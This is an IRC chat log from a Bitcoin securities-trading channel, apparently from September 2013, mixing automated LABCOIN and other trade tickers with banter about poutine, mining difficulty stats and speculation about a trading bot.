[BTCTC] [LABCOIN] 190 @ 0.002 = 0.38 BTC [+] Sep 14 09:03:16 To me all food is a meal. Sep 14 09:03:17 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [+] Sep 14 09:03:22 Including sweets Sep 14 09:03:28 Namworld is a bird Sep 14 09:03:42 any food = meal Sep 14 09:04:01 It's true. Sep 14 09:04:08 lol Sep 14 09:04:27 [BTCTC] [LABCOIN] 685 @ 0.002 = 1.37 BTC [+] Sep 14 09:05:35 [BTCTC] [LABCOIN] 76 @ 0.002029 = 0.1542 BTC [+] Sep 14 09:06:10 "It was a god awful resume. You even gave your last name two different spellings, listed the wrong area code, had your work experience in random order, and had no less than 20 spelling mistakes on the first page." Sep 14 09:06:10 "It wasn't that bad." Sep 14 09:06:58 [BTCTC] [LABCOIN] 300 @ 0.002029 = 0.6087 BTC [+] Sep 14 09:07:10 [BTCTC] [LABCOIN] 100 @ 0.002029 = 0.2029 BTC [+] Sep 14 09:07:32 [BTCTC] [LABCOIN] 200 @ 0.002029 = 0.4058 BTC [+] Sep 14 09:07:38 Does this mean I don't get a job? Sep 14 09:07:43 lol Sep 14 09:07:53 are you reading the same page or just channeling the same experience ? Sep 14 09:07:58 Here's an image of what a good poutine should look like: http://canadatry.fr/wp-content/uploads/2012/10/banquise-poutine.jpeg Sep 14 09:08:08 i googled it :) Sep 14 09:08:11 No american processed cheese, not golden crisp fries. Sep 14 09:08:15 [BTCTC] [LABCOIN] 200 @ 0.002025 = 0.405 BTC [-] Sep 14 09:08:17 [BTCTC] [LABCOIN] 400 @ 0.002029 = 0.8116 BTC [+] Sep 14 09:08:18 [BTCTC] [LABCOIN] 1961 @ 0.002048 = 4.0161 BTC [+] Sep 14 09:08:18 what is poutine actually Sep 14 09:08:19 [BTCTC] [LABCOIN] 629 @ 0.00206 = 1.2957 BTC [+] Sep 14 09:08:20 [BTCTC] [LABCOIN] 575 @ 0.00209 = 1.2018 BTC [+] Sep 14 09:08:21 [BTCTC] [LABCOIN] 96 @ 0.002095 = 0.2011 BTC [+] Sep 14 09:08:26 cheese curds and brown fries. Sep 14 09:08:30 it just looks like crispy fries Sep 14 09:08:32 with sauce Sep 14 09:08:47 and cheese curds Sep 14 09:08:58 silicone and grease vessels with slime Sep 14 09:08:59 beef gravy and cheese curds Sep 14 09:09:12 i thought it was some extravagent french canadian delicacy Sep 14 09:09:21 looks like 3am friday night dish Sep 14 09:09:33 [BTCTC] [LABCOIN] 100 @ 0.002098 = 0.2098 BTC [+] Sep 14 09:10:02 French canadian does not equal "cuisine de france" Sep 14 09:10:05 [BTCTC] [LABCOIN] 200 @ 0.00209 = 0.418 BTC [-] Sep 14 09:10:20 ^ Sep 14 09:10:35 french canadian is like, "i'm a lumberjack and im oookaaaaayyy" Sep 14 09:10:40 I was watchning vice doc, they have some hipster blend of kebab Sep 14 09:10:48 it's the place american-french love affairs send their babies Sep 14 09:10:56 [BTCTC] [LABCOIN] 100 @ 0.002064 = 0.2064 BTC [-] Sep 14 09:11:05 [BTCTC] [ASICMINER-PT] 1 @ 2.149 BTC [+] Sep 14 09:11:18 French canadian is earthy, greasy stuff. Sep 14 09:11:18 what's that thing about canada, it could have had french cuisine, american business and british culture Sep 14 09:11:31 instead they ended up with british cuisine, french business and american culture ? Sep 14 09:11:40 Yes Sep 14 09:11:48 [BTCTC] [LABCOIN] 75 @ 0.00203 = 0.1523 BTC [-] Sep 14 09:11:49 [BTCTC] [LABCOIN] 75 @ 0.002029 = 0.1522 BTC [-] Sep 14 09:11:51 [BTCTC] [LABCOIN] 75 @ 0.002026 = 0.152 BTC [-] Sep 14 09:11:52 [BTCTC] [LABCOIN] 24 @ 0.002004 = 0.0481 BTC [-] Sep 14 09:11:53 [BTCTC] [LABCOIN] 157 @ 0.002002 = 0.3143 BTC [-] Sep 14 09:11:54 [BTCTC] [LABCOIN] 76 @ 0.002001 = 0.1521 BTC [-] Sep 14 09:11:55 [BTCTC] [LABCOIN] 518 @ 0.002 = 1.036 BTC [-] Sep 14 09:12:16 [BTCTC] [LABCOIN] 75 @ 0.002058 = 0.1544 BTC [+] Sep 14 09:12:30 [BTCTC] [LABCOIN] 75 @ 0.002058 = 0.1544 BTC [+] Sep 14 09:12:43 [BTCTC] [LABCOIN] 75 @ 0.002059 = 0.1544 BTC [+] Sep 14 09:12:45 [BTCTC] [LABCOIN] 195 @ 0.00206 = 0.4017 BTC [+] Sep 14 09:12:45 [BTCTC] [LABCOIN] 25 @ 0.002058 = 0.0515 BTC [-] Sep 14 09:12:47 ;;nethash Sep 14 09:12:47 914126.822971 Sep 14 09:12:47 [BTCTC] [LABCOIN] 75 @ 0.002012 = 0.1509 BTC [-] Sep 14 09:12:48 [BTCTC] [LABCOIN] 75 @ 0.002002 = 0.1502 BTC [-] Sep 14 09:12:53 ;;estimate Sep 14 09:12:54 Next difficulty estimate | 111250639.508 based on data since last change | 127700093.366 based on data for last three days Sep 14 09:12:55 [BTCTC] [LABCOIN] 97 @ 0.002002 = 0.1942 BTC [-] Sep 14 09:12:56 ;;bcstats Sep 14 09:13:04 what, not even 25million yet ?! Sep 14 09:13:06 ;;bc,stats Sep 14 09:13:06 [BTCTC] [LABCOIN] 75 @ 0.002002 = 0.1502 BTC [-] Sep 14 09:13:08 Current Blocks: 257887 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 160 blocks | Next Difficulty In About: 18 hours, 6 minutes, and 47 seconds | Next Difficulty Estimate: 111250639.508 | Estimated Percent Change: 27.97283 Sep 14 09:13:10 Current Blocks: 257887 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 160 blocks | Next Difficulty In About: 18 hours, 6 minutes, and 47 seconds | Next Difficulty Estimate: 111250639.508 | Estimated Percent Change: 27.97283 Sep 14 09:13:11 sonhash, i am dissapoint. Sep 14 09:13:15 [BTCTC] [LABCOIN] 262 @ 0.002002 = 0.5245 BTC [-] Sep 14 09:13:17 [BTCTC] [LABCOIN] 982 @ 0.002 = 1.964 BTC [-] Sep 14 09:13:19 [BTCTC] [LABCOIN] 18 @ 0.002 = 0.036 BTC [-] Sep 14 09:13:30 i blame labcoin Sep 14 09:13:31 [BTCTC] [LABCOIN] 196 @ 0.002002 = 0.3924 BTC [+] Sep 14 09:13:32 [BTCTC] [LABCOIN] 4 @ 0.002002 = 0.008 BTC [+] Sep 14 09:13:33 [BTCTC] [LABCOIN] 458 @ 0.002002 = 0.9169 BTC [+] Sep 14 09:13:35 [BTCTC] [LABCOIN] 100 @ 0.002002 = 0.2002 BTC [+] Sep 14 09:13:36 [BTCTC] [LABCOIN] 238 @ 0.002 = 0.476 BTC [-] Sep 14 09:13:44 [BTCTC] [LABCOIN] 20 @ 0.002065 = 0.0413 BTC [+] Sep 14 09:13:58 [BTCTC] [LABCOIN] 25 @ 0.002003 = 0.0501 BTC [-] Sep 14 09:13:59 [BTCTC] [LABCOIN] 40 @ 0.002002 = 0.0801 BTC [-] Sep 14 09:14:01 [BTCTC] [LABCOIN] 211 @ 0.002002 = 0.4224 BTC [-] Sep 14 09:14:02 [BTCTC] [LABCOIN] 142 @ 0.002001 = 0.2841 BTC [-] Sep 14 09:14:03 [BTCTC] [LABCOIN] 1244 @ 0.002 = 2.488 BTC [-] Sep 14 09:14:04 [BTCTC] [LABCOIN] 185 @ 0.002 = 0.37 BTC [-] Sep 14 09:14:13 [BTCTC] [LABCOIN] 150 @ 0.002 = 0.3 BTC [-] Sep 14 09:14:25 [BTCTC] [LABCOIN] 150 @ 0.002 = 0.3 BTC [-] Sep 14 09:14:27 [BTCTC] [LABCOIN] 20 @ 0.002 = 0.04 BTC [-] Sep 14 09:14:30 25 million what? Sep 14 09:14:37 [BTCTC] [LABCOIN] 200 @ 0.002 = 0.4 BTC [-] Sep 14 09:14:38 [BTCTC] [LABCOIN] 1300 @ 0.002 = 2.6 BTC [-] Sep 14 09:14:40 [BTCTC] [LABCOIN] 520 @ 0.002 = 1.04 BTC [-] Sep 14 09:14:49 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 09:15:14 [BTCTC] [LABCOIN] 9 @ 0.001994 = 0.0179 BTC [-] Sep 14 09:15:17 [BTCTC] [LABCOIN] 9 @ 0.001978 = 0.0178 BTC [-] Sep 14 09:15:19 [BTCTC] [LABCOIN] 10 @ 0.001962 = 0.0196 BTC [-] Sep 14 09:15:21 [BTCTC] [LABCOIN] 191 @ 0.001951 = 0.3726 BTC [-] Sep 14 09:15:21 914126.822971 << these. Sep 14 09:15:21 [BTCTC] [LABCOIN] 790 @ 0.00195 = 1.5405 BTC [-] Sep 14 09:15:24 [BTCTC] [LABCOIN] 89 @ 0.001982 = 0.1764 BTC [+] Sep 14 09:15:25 [BTCTC] [LABCOIN] 200 @ 0.001999 = 0.3998 BTC [+] Sep 14 09:15:27 [BTCTC] [LABCOIN] 1380 @ 0.002 = 2.76 BTC [+] Sep 14 09:15:36 [BTCTC] [LABCOIN] 97 @ 0.002 = 0.194 BTC [+] Sep 14 09:15:42 What does that represent? Sep 14 09:15:44 [BTCTC] [LABCOIN] 96 @ 0.002 = 0.192 BTC [+] Sep 14 09:15:45 ghash/s? Sep 14 09:15:51 i dunno dood. i just work here. Sep 14 09:15:51 [HAVELOCK] [CFIG] 10 @ 0.14 = 1.4 BTC [-] Sep 14 09:15:56 914TH Sep 14 09:15:57 it's some number everyone cares about Sep 14 09:16:01 [HAVELOCK] [CFIG] 2 @ 0.13555 = 0.2711 BTC [-] Sep 14 09:16:09 [HAVELOCK] [CFIG] 1 @ 0.13500001 BTC [-] Sep 14 09:16:22 [BTCTC] [LABCOIN] 100 @ 0.002002 = 0.2002 BTC [+] Sep 14 09:16:23 [BTCTC] [LABCOIN] 6 @ 0.002001 = 0.012 BTC [-] Sep 14 09:16:24 [BTCTC] [LABCOIN] 138 @ 0.002 = 0.276 BTC [-] Sep 14 09:16:25 [BTCTC] [LABCOIN] 1 @ 0.002 BTC [-] Sep 14 09:16:26 [BTCTC] [LABCOIN] 48 @ 0.002 = 0.096 BTC [-] Sep 14 09:16:32 [BTCTC] [LABCOIN] 39 @ 0.002 = 0.078 BTC [-] Sep 14 09:16:34 [BTCTC] [LABCOIN] 278 @ 0.002 = 0.556 BTC [-] Sep 14 09:16:37 [BTCTC] [LABCOIN] 39 @ 0.002 = 0.078 BTC [-] Sep 14 09:16:43 so does labcoin reach 1 these days or dead cat bounce first ? Sep 14 09:16:47 [BTCTC] [LABCOIN] 76 @ 0.001997 = 0.1518 BTC [-] Sep 14 09:16:49 [BTCTC] [LABCOIN] 76 @ 0.001997 = 0.1518 BTC [-] Sep 14 09:16:55 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 09:17:06 [BTCTC] [LABCOIN] 112 @ 0.001951 = 0.2185 BTC [-] Sep 14 09:17:14 well the people will use IPO price as springboard Sep 14 09:17:17 [BTCTC] [LABCOIN] 200 @ 0.00195 = 0.39 BTC [-] Sep 14 09:17:18 [BTCTC] [LABCOIN] 925 @ 0.00195 = 1.8038 BTC [-] Sep 14 09:17:21 dunno whatt that was tho Sep 14 09:17:28 [BTCTC] [LABCOIN] 6 @ 0.001947 = 0.0117 BTC [-] Sep 14 09:17:33 .001 Sep 14 09:17:39 [BTCTC] [LABCOIN] 660 @ 0.001948 = 1.2857 BTC [+] Sep 14 09:17:41 [BTCTC] [LABCOIN] 40 @ 0.00195 = 0.078 BTC [+] Sep 14 09:17:45 then mp gets a cookie Sep 14 09:17:47 it was 1 hence the q Sep 14 09:17:52 [BTCTC] [LABCOIN] 100 @ 0.00195 = 0.195 BTC [+] Sep 14 09:18:04 [BTCTC] [LABCOIN] 700 @ 0.001903 = 1.3321 BTC [-] Sep 14 09:18:07 [BTCTC] [ACTIVEMINING] 10 @ 0.003033 = 0.0303 BTC [+] Sep 14 09:18:08 [BTCTC] [ACTIVEMINING] 10 @ 0.003034 = 0.0303 BTC [+] Sep 14 09:18:10 [BTCTC] [ACTIVEMINING] 327 @ 0.003049 = 0.997 BTC [+] Sep 14 09:18:11 [BTCTC] [ACTIVEMINING] 327 @ 0.00305 = 0.9974 BTC [+] Sep 14 09:18:12 [BTCTC] [ACTIVEMINING] 512 @ 0.003063 = 1.5683 BTC [+] Sep 14 09:18:12 [BTCTC] [ACTIVEMINING] 512 @ 0.00307 = 1.5718 BTC [+] Sep 14 09:18:13 [BTCTC] [ACTIVEMINING] 675 @ 0.003074 = 2.075 BTC [+] Sep 14 09:18:14 [BTCTC] [ACTIVEMINING] 127 @ 0.003075 = 0.3905 BTC [+] Sep 14 09:18:19 pivot! Sep 14 09:18:37 [BTCTC] [LABCOIN] 100 @ 0.001901 = 0.1901 BTC [-] Sep 14 09:18:39 [BTCTC] [LABCOIN] 1000 @ 0.0019 = 1.9 BTC [-] Sep 14 09:19:06 meanwhile ActM is at like .002 on BF Sep 14 09:19:22 [BTCTC] [LABCOIN] 88 @ 0.00189 = 0.1663 BTC [-] Sep 14 09:19:32 all that arb, starving for liquidity Sep 14 09:19:41 [BTCTC] [LABCOIN] 13 @ 0.001873 = 0.0243 BTC [-] Sep 14 09:20:21 [BTCTC] [LABCOIN] 69 @ 0.001873 = 0.1292 BTC [-] Sep 14 09:20:23 [BTCTC] [LABCOIN] 213 @ 0.001841 = 0.3921 BTC [-] Sep 14 09:20:32 [BTCTC] [LABCOIN] 97 @ 0.001824 = 0.1769 BTC [-] Sep 14 09:20:32 [BTCTC] [LABCOIN] 5 @ 0.001813 = 0.0091 BTC [-] Sep 14 09:20:34 [BTCTC] [LABCOIN] 50 @ 0.001812 = 0.0906 BTC [-] Sep 14 09:20:35 [BTCTC] [LABCOIN] 19 @ 0.00181 = 0.0344 BTC [-] Sep 14 09:20:36 [BTCTC] [LABCOIN] 100 @ 0.001809 = 0.1809 BTC [-] Sep 14 09:20:37 [BTCTC] [LABCOIN] 96 @ 0.001809 = 0.1737 BTC [-] Sep 14 09:20:39 well that's what happens when you selftrade on store credit and ukyo doesn't cut you the same scammy deal. Sep 14 09:20:39 [BTCTC] [LABCOIN] 50 @ 0.001807 = 0.0904 BTC [-] Sep 14 09:20:40 [BTCTC] [LABCOIN] 500 @ 0.001806 = 0.903 BTC [-] Sep 14 09:20:41 [BTCTC] [LABCOIN] 60 @ 0.001805 = 0.1083 BTC [-] Sep 14 09:20:42 [BTCTC] [LABCOIN] 58 @ 0.001804 = 0.1046 BTC [-] Sep 14 09:20:43 [BTCTC] [LABCOIN] 97 @ 0.001838 = 0.1783 BTC [+] Sep 14 09:20:43 [BTCTC] [LABCOIN] 442 @ 0.001804 = 0.7974 BTC [-] Sep 14 09:20:44 [BTCTC] [LABCOIN] 100 @ 0.001803 = 0.1803 BTC [-] Sep 14 09:20:45 [BTCTC] [LABCOIN] 300 @ 0.001802 = 0.5406 BTC [-] Sep 14 09:20:47 [BTCTC] [LABCOIN] 561 @ 0.001802 = 1.0109 BTC [-] Sep 14 09:20:55 [BTCTC] [LABCOIN] 1 @ 0.001874 BTC [+] Sep 14 09:21:35 poor guy, it's like trying to prop a walrus up with a stick Sep 14 09:22:02 or an eel. Sep 14 09:22:09 [BTCTC] [LABCOIN] 156 @ 0.001876 = 0.2927 BTC [+] Sep 14 09:22:10 [BTCTC] [LABCOIN] 844 @ 0.001874 = 1.5817 BTC [-] Sep 14 09:22:17 [BTCTC] [LABCOIN] 114 @ 0.001874 = 0.2136 BTC [-] Sep 14 09:22:48 they should have listened to the words of the omniprescient mircea Sep 14 09:23:15 where'd be the fun in that. Sep 14 09:23:33 [BTCTC] [LABCOIN] 138 @ 0.001876 = 0.2589 BTC [+] Sep 14 09:23:35 [BTCTC] [LABCOIN] 847 @ 0.001874 = 1.5873 BTC [-] Sep 14 09:24:05 mircea_popescu: you can be smug with those who told you it will be at the moon today Sep 14 09:24:21 i got a list by now. what do i care. Sep 14 09:24:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0202 = 0.0404 BTC [+] Sep 14 09:24:58 [BTCTC] [LABCOIN] 12 @ 0.001889 = 0.0227 BTC [+] Sep 14 09:25:10 [BTCTC] [LABCOIN] 1194 @ 0.001874 = 2.2376 BTC [-] Sep 14 09:25:12 [BTCTC] [LABCOIN] 138 @ 0.001838 = 0.2536 BTC [-] Sep 14 09:25:13 [BTCTC] [LABCOIN] 96 @ 0.001836 = 0.1763 BTC [-] Sep 14 09:25:14 [BTCTC] [LABCOIN] 99 @ 0.001822 = 0.1804 BTC [-] Sep 14 09:25:16 [BTCTC] [LABCOIN] 750 @ 0.00181 = 1.3575 BTC [-] Sep 14 09:25:17 [BTCTC] [LABCOIN] 9 @ 0.001809 = 0.0163 BTC [-] Sep 14 09:25:18 [BTCTC] [LABCOIN] 98 @ 0.001808 = 0.1772 BTC [-] Sep 14 09:25:20 [BTCTC] [LABCOIN] 50 @ 0.001804 = 0.0902 BTC [-] Sep 14 09:25:21 [BTCTC] [LABCOIN] 500 @ 0.001803 = 0.9015 BTC [-] Sep 14 09:25:23 [BTCTC] [LABCOIN] 507 @ 0.001802 = 0.9136 BTC [-] Sep 14 09:25:23 does mp have a 'smug' setting? Sep 14 09:25:23 [BTCTC] [LABCOIN] 100 @ 0.001801 = 0.1801 BTC [-] Sep 14 09:25:24 [BTCTC] [LABCOIN] 200 @ 0.001801 = 0.3602 BTC [-] Sep 14 09:25:25 [BTCTC] [LABCOIN] 100 @ 0.001801 = 0.1801 BTC [-] Sep 14 09:25:26 [BTCTC] [LABCOIN] 1288 @ 0.0018 = 2.3184 BTC [-] Sep 14 09:25:27 [BTCTC] [LABCOIN] 10 @ 0.0019 = 0.019 BTC [+] Sep 14 09:25:43 ThickAsThieves: this button is default in depresset state Sep 14 09:25:46 nope. humble only. Sep 14 09:25:51 [BTCTC] [LABCOIN] 240 @ 0.001845 = 0.4428 BTC [-] Sep 14 09:26:16 [BTCTC] [ASICMINER-PT] 1 @ 2.146 BTC [+] Sep 14 09:26:54 [BTCTC] [LABCOIN] 450 @ 0.001854 = 0.8343 BTC [+] Sep 14 09:27:20 [BTCTC] [LABCOIN] 84 @ 0.001868 = 0.1569 BTC [+] Sep 14 09:27:35 [BTCTC] [ASICMINER-PT] 4 @ 2.1 = 8.4 BTC [-] Sep 14 09:27:57 [BTCTC] [LABCOIN] 100 @ 0.001854 = 0.1854 BTC [-] Sep 14 09:28:07 [BTCTC] [LABCOIN] 84 @ 0.001868 = 0.1569 BTC [+] Sep 14 09:29:06 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 09:29:18 yay for calculator on bitbet Sep 14 09:29:51 bitbet like listens to customers and everything. Sep 14 09:29:52 [BTCTC] [LABCOIN] 121 @ 0.001854 = 0.2243 BTC [-] Sep 14 09:29:53 [BTCTC] [LABCOIN] 73 @ 0.001847 = 0.1348 BTC [-] Sep 14 09:29:54 [BTCTC] [LABCOIN] 160 @ 0.001845 = 0.2952 BTC [-] Sep 14 09:29:55 [BTCTC] [LABCOIN] 46 @ 0.001831 = 0.0842 BTC [-] Sep 14 09:30:23 [BTCTC] [LABCOIN] 38 @ 0.001831 = 0.0696 BTC [-] Sep 14 09:30:25 [BTCTC] [LABCOIN] 73 @ 0.001807 = 0.1319 BTC [-] Sep 14 09:30:26 [BTCTC] [LABCOIN] 50 @ 0.001805 = 0.0903 BTC [-] Sep 14 09:30:27 [BTCTC] [LABCOIN] 300 @ 0.001803 = 0.5409 BTC [-] Sep 14 09:30:29 [BTCTC] [LABCOIN] 4600 @ 0.001803 = 8.2938 BTC [-] Sep 14 09:30:29 [BTCTC] [LABCOIN] 40 @ 0.001802 = 0.0721 BTC [-] Sep 14 09:30:30 [BTCTC] [LABCOIN] 56 @ 0.001801 = 0.1009 BTC [-] Sep 14 09:31:26 http://bitbet.us/bet/532/btc-guild-to-have-at-least-50-hashrate/ the source isn't good, they often make mistakes Sep 14 09:31:32 I think they mostly look at the IP Sep 14 09:31:40 [BTCTC] [LABCOIN] 86 @ 0.001811 = 0.1557 BTC [+] Sep 14 09:31:41 [BTCTC] [LABCOIN] 1914 @ 0.001801 = 3.4471 BTC [-] Sep 14 09:32:05 well the source is what it is. Sep 14 09:32:07 what else we got ? Sep 14 09:32:13 (i know they often fuck up) Sep 14 09:32:18 [BTCTC] [LABCOIN] 700 @ 0.001801 = 1.2607 BTC [-] Sep 14 09:32:33 [BTCTC] [LABCOIN] 330 @ 0.001801 = 0.5943 BTC [-] Sep 14 09:32:36 [BTCTC] [LABCOIN] 86 @ 0.001801 = 0.1549 BTC [-] Sep 14 09:32:38 [BTCTC] [LABCOIN] 3712 @ 0.0018 = 6.6816 BTC [-] Sep 14 09:32:40 [BTCTC] [LABCOIN] 800 @ 0.0018 = 1.44 BTC [-] Sep 14 09:32:41 [BTCTC] [LABCOIN] 5000 @ 0.0018 = 9 BTC [-] Sep 14 09:32:42 [BTCTC] [LABCOIN] 500 @ 0.0018 = 0.9 BTC [-] Sep 14 09:33:24 [BTCTC] [LABCOIN] 20 @ 0.001798 = 0.036 BTC [-] Sep 14 09:33:39 [BTCTC] [LABCOIN] 22 @ 0.001796 = 0.0395 BTC [-] Sep 14 09:35:37 [BTCTC] [LABCOIN] 89 @ 0.00177 = 0.1575 BTC [-] Sep 14 09:35:38 [BTCTC] [LABCOIN] 5 @ 0.001708 = 0.0085 BTC [-] Sep 14 09:35:40 [BTCTC] [LABCOIN] 20 @ 0.001707 = 0.0341 BTC [-] Sep 14 09:35:41 [BTCTC] [LABCOIN] 475 @ 0.001706 = 0.8104 BTC [-] Sep 14 09:35:43 [BTCTC] [LABCOIN] 700 @ 0.001706 = 1.1942 BTC [-] Sep 14 09:35:45 [BTCTC] [LABCOIN] 465 @ 0.001706 = 0.7933 BTC [-] Sep 14 09:35:47 [BTCTC] [LABCOIN] 190 @ 0.001702 = 0.3234 BTC [-] Sep 14 09:35:48 [BTCTC] [LABCOIN] 1000 @ 0.001701 = 1.701 BTC [-] Sep 14 09:35:49 [BTCTC] [LABCOIN] 164 @ 0.0017 = 0.2788 BTC [-] Sep 14 09:35:50 [BTCTC] [LABCOIN] 1000 @ 0.0017 = 1.7 BTC [-] Sep 14 09:35:52 [BTCTC] [LABCOIN] 699 @ 0.0017 = 1.1883 BTC [-] Sep 14 09:36:27 [BTCTC] [LABCOIN] 91 @ 0.001722 = 0.1567 BTC [+] Sep 14 09:36:28 [BTCTC] [LABCOIN] 57 @ 0.0017 = 0.0969 BTC [-] Sep 14 09:36:44 [BTCTC] [LABCOIN] 14 @ 0.0017 = 0.0238 BTC [-] Sep 14 09:36:45 [BTCTC] [LABCOIN] 857 @ 0.0017 = 1.4569 BTC [-] Sep 14 09:37:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02001 BTC [-] Sep 14 09:38:37 [BTCTC] [DMS.MINING] 28 @ 0.002605 = 0.0729 BTC [+] Sep 14 09:38:38 [BTCTC] [DMS.MINING] 472 @ 0.002604 = 1.2291 BTC [-] Sep 14 09:39:31 [BTCTC] [RSM] 1 @ 0.007 BTC [+] Sep 14 09:42:31 [BTCTC] [LABCOIN] 4 @ 0.001739 = 0.007 BTC [+] Sep 14 09:42:45 [BTCTC] [LABCOIN] 92 @ 0.001716 = 0.1579 BTC [-] Sep 14 09:42:47 [BTCTC] [LABCOIN] 92 @ 0.001716 = 0.1579 BTC [-] Sep 14 09:42:48 [BTCTC] [LABCOIN] 92 @ 0.001716 = 0.1579 BTC [-] Sep 14 09:42:49 [BTCTC] [LABCOIN] 92 @ 0.001716 = 0.1579 BTC [-] Sep 14 09:42:51 [BTCTC] [LABCOIN] 92 @ 0.001715 = 0.1578 BTC [-] Sep 14 09:42:52 [BTCTC] [LABCOIN] 92 @ 0.001713 = 0.1576 BTC [-] Sep 14 09:42:53 [BTCTC] [LABCOIN] 143 @ 0.0017 = 0.2431 BTC [-] Sep 14 09:42:54 [BTCTC] [LABCOIN] 3 @ 0.0017 = 0.0051 BTC [-] Sep 14 09:42:55 [BTCTC] [LABCOIN] 100 @ 0.00168 = 0.168 BTC [-] Sep 14 09:42:56 [BTCTC] [LABCOIN] 615 @ 0.001669 = 1.0264 BTC [-] Sep 14 09:44:39 [BTCTC] [RSM] 2 @ 0.004134 = 0.0083 BTC [-] Sep 14 09:45:05 [BTCTC] [LABCOIN] 200 @ 0.0017 = 0.34 BTC [+] Sep 14 09:45:38 [BTCTC] [COGNITIVE] 1 @ 0.2598 BTC [-] Sep 14 09:45:46 [BTCTC] [COGNITIVE] 3 @ 0.2502 = 0.7506 BTC [-] Sep 14 09:45:51 [BTCTC] [COGNITIVE] 4 @ 0.25 = 1 BTC [-] Sep 14 09:45:56 [BTCTC] [COGNITIVE] 10 @ 0.24 = 2.4 BTC [-] Sep 14 09:45:59 [BTCTC] [COGNITIVE] 1 @ 0.235 BTC [-] Sep 14 09:46:05 [MPEX] [S.MPOE] 1663 @ 0.00090886 = 1.5114 BTC [+] Sep 14 09:46:06 [MPEX] [S.MPOE] 37 @ 0.000909 = 0.0336 BTC [+] Sep 14 09:46:08 [BTCTC] [COGNITIVE] 1 @ 0.2338 BTC [-] Sep 14 09:46:09 [BTCTC] [COGNITIVE] 1 @ 0.2318 BTC [-] Sep 14 09:46:13 [BTCTC] [COGNITIVE] 15 @ 0.225 = 3.375 BTC [-] Sep 14 09:46:34 [BTCTC] [LABCOIN] 500 @ 0.001701 = 0.8505 BTC [+] Sep 14 09:46:37 [BTCTC] [LABCOIN] 93 @ 0.001715 = 0.1595 BTC [+] Sep 14 09:46:40 [BTCTC] [LABCOIN] 1266 @ 0.001701 = 2.1535 BTC [-] Sep 14 09:48:41 [BTCTC] [LABCOIN] 350 @ 0.001701 = 0.5954 BTC [-] Sep 14 09:48:44 [BTCTC] [LABCOIN] 93 @ 0.001715 = 0.1595 BTC [+] Sep 14 09:50:58 [BTCTC] [LABCOIN] 93 @ 0.001715 = 0.1595 BTC [+] Sep 14 09:51:00 [BTCTC] [LABCOIN] 93 @ 0.001716 = 0.1596 BTC [+] Sep 14 09:51:01 [BTCTC] [LABCOIN] 93 @ 0.001719 = 0.1599 BTC [+] Sep 14 09:51:02 [BTCTC] [LABCOIN] 93 @ 0.00172 = 0.16 BTC [+] Sep 14 09:51:03 [BTCTC] [LABCOIN] 92 @ 0.001739 = 0.16 BTC [+] Sep 14 09:51:04 [BTCTC] [LABCOIN] 92 @ 0.001739 = 0.16 BTC [+] Sep 14 09:51:05 [BTCTC] [LABCOIN] 92 @ 0.001739 = 0.16 BTC [+] Sep 14 09:51:05 [BTCTC] [LABCOIN] 184 @ 0.001739 = 0.32 BTC [+] Sep 14 09:51:07 [BTCTC] [LABCOIN] 92 @ 0.00174 = 0.1601 BTC [+] Sep 14 09:51:08 [BTCTC] [LABCOIN] 92 @ 0.001741 = 0.1602 BTC [+] Sep 14 09:51:09 [BTCTC] [LABCOIN] 92 @ 0.001743 = 0.1604 BTC [+] Sep 14 09:51:10 [BTCTC] [LABCOIN] 92 @ 0.001744 = 0.1604 BTC [+] Sep 14 09:51:11 [BTCTC] [LABCOIN] 91 @ 0.001756 = 0.1598 BTC [+] Sep 14 09:51:21 [BTCTC] [LABCOIN] 91 @ 0.001757 = 0.1599 BTC [+] Sep 14 09:51:24 [BTCTC] [LABCOIN] 20 @ 0.001777 = 0.0355 BTC [+] Sep 14 09:51:25 [BTCTC] [LABCOIN] 20 @ 0.001778 = 0.0356 BTC [+] Sep 14 09:51:27 [BTCTC] [LABCOIN] 712 @ 0.001781 = 1.2681 BTC [+] Sep 14 09:51:27 [BTCTC] [LABCOIN] 712 @ 0.001784 = 1.2702 BTC [+] Sep 14 09:51:28 [BTCTC] [LABCOIN] 200 @ 0.001786 = 0.3572 BTC [+] Sep 14 09:51:29 reversal Sep 14 09:51:29 [BTCTC] [LABCOIN] 100 @ 0.001787 = 0.1787 BTC [+] Sep 14 09:51:30 [BTCTC] [LABCOIN] 196 @ 0.0018 = 0.3528 BTC [+] Sep 14 09:51:36 [BTCTC] [LABCOIN] 92 @ 0.001722 = 0.1584 BTC [-] Sep 14 09:51:38 [BTCTC] [LABCOIN] 10 @ 0.001716 = 0.0172 BTC [-] Sep 14 09:51:39 [BTCTC] [LABCOIN] 100 @ 0.001702 = 0.1702 BTC [-] Sep 14 09:51:58 [BTCTC] [LABCOIN] 129 @ 0.001701 = 0.2194 BTC [-] Sep 14 09:52:02 you called it. Sep 14 09:52:38 [BTCTC] [LABCOIN] 4 @ 0.001702 = 0.0068 BTC [+] Sep 14 09:53:33 [BTCTC] [LABCOIN] 94 @ 0.001702 = 0.16 BTC [+] Sep 14 09:53:49 [BTCTC] [LABCOIN] 555 @ 0.001701 = 0.9441 BTC [-] Sep 14 09:54:04 [BTCTC] [LABCOIN] 30 @ 0.001702 = 0.0511 BTC [+] Sep 14 09:54:15 http://log.bitcoin-assets.com/#310458 Sep 14 09:54:28 [BTCTC] [LABCOIN] 200 @ 0.001702 = 0.3404 BTC [+] Sep 14 09:54:51 well, let's see how it turns out :) Sep 14 09:57:03 i don't get what's suspicious ? Sep 14 09:57:25 scroll a few lines higher Sep 14 09:58:08 the sale quantities: 9, 9, 9, 96, 9, 96, 9, 99, 95, 9, 95 Sep 14 09:58:20 [BTCTC] [LABCOIN] 500 @ 0.001702 = 0.851 BTC [+] Sep 14 09:58:21 so, i always bid 69 Sep 14 09:58:44 dexX7 it's probably a bot trying to do book volume arbing. Sep 14 09:58:58 as the book thinned out it dropped to 92s/91s Sep 14 09:59:03 [BTCTC] [LABCOIN] 5137 @ 0.001702 = 8.7432 BTC [+] Sep 14 09:59:05 [BTCTC] [LABCOIN] 50 @ 0.001702 = 0.0851 BTC [+] Sep 14 